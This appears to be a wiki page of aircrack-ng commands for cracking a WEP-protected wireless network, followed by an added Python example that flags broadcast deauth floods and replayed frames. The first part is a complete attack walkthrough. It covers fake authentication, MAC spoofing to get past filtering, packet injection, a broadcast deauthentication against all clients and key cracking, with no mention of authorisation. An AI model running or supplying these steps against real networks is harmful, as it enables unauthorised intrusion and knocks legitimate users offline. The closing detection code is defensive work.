From LinuxWindowsWiki
List adapters:
airmon-ng
Set the card in monitor mode:
airmon-ng start wlan0
Find AP:
airodump-ng mon0
Lock channel with AP:
airodump-ng --channel 6 mon0
Leave it running, open a new terminal, and attempt fake authentication:
aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0
If it fails, MAC filtering is on. In that case, use the MAC of one of the clients associated with the AP.
Change the MAC with macchanger (00:11:22:33:44:55 stands for the MAC of the client):
airmon-ng stop mon0
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
airmon-ng start wlan0
Try fake auth again:
aireplay-ng --fakeauth 0 -a 00:14:BF:11:22:33 -e testEssid mon0
Stop airodump-ng and run it again, writing the capture to a file:
airodump-ng -c 6 -w ~/testEssid -i mon0
Launch aireplay-ng in injection mode:
aireplay-ng -3 -b 00:14:BF:11:22:33 mon0
Leave it running. To speed things up, send a broadcast deauth:
aireplay-ng --deauth 0 -a 00:14:BF:11:22:33 mon0
Crack:
aircrack-ng -0 -b 00:14:BF:11:22:33 ~/testEssid-01.ivs
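Seen from the network owner's side, the injection and broadcast deauth steps above appear as bursts of frames on the AP's channel. The following is an added example, not part of the original wiki page, that flags both patterns in per-frame summaries; the record layout, the thresholds and the sample frames are constructed assumptions.

```python
from collections import Counter

AP = "00:14:BF:11:22:33"          # example BSSID used on this page
CLIENT = "00:11:22:33:44:55"      # example client MAC used on this page
BROADCAST = "FF:FF:FF:FF:FF:FF"

def build_sample():
    """Constructed frame summaries: (time_s, subtype, src, dst, length)."""
    frames = []
    # Ordinary traffic: one varied-length data frame per second, client to AP.
    for i in range(10):
        frames.append((float(i), "data", CLIENT, AP, 100 + 37 * i))
    # Burst of broadcast deauthentication frames carrying the AP's address.
    for i in range(60):
        frames.append((10 + i * 0.02, "deauth", AP, BROADCAST, 26))
    # One station repeating a same-length broadcast data frame at high rate.
    for i in range(500):
        frames.append((12 + i * 0.002, "data", CLIENT, BROADCAST, 68))
    return sorted(frames)

def detect(frames, window=1.0, deauth_limit=20, replay_limit=100):
    """Return {(alert, source MAC)} for sources over a per-window limit.

    The limits are illustrative assumptions; tune them to the site's baseline.
    """
    deauth, replay = Counter(), Counter()
    for t, subtype, src, dst, length in frames:
        bucket = int(t // window)
        if dst != BROADCAST:
            continue
        if subtype == "deauth":
            deauth[(bucket, src)] += 1
        elif subtype == "data":
            # Heuristic: replayed frames share source and exact length.
            replay[(bucket, src, length)] += 1
    alerts = set()
    for (_, src), n in deauth.items():
        if n > deauth_limit:
            alerts.add(("deauth_flood", src))
    for (_, src, _), n in replay.items():
        if n > replay_limit:
            alerts.add(("replayed_broadcast_data", src))
    return alerts

if __name__ == "__main__":
    for alert, src in sorted(detect(build_sample())):
        print(alert, src)
```

The source address in a deauth alert is the value carried in the frame, which can be forged, so treat it as the targeted BSSID rather than the sender.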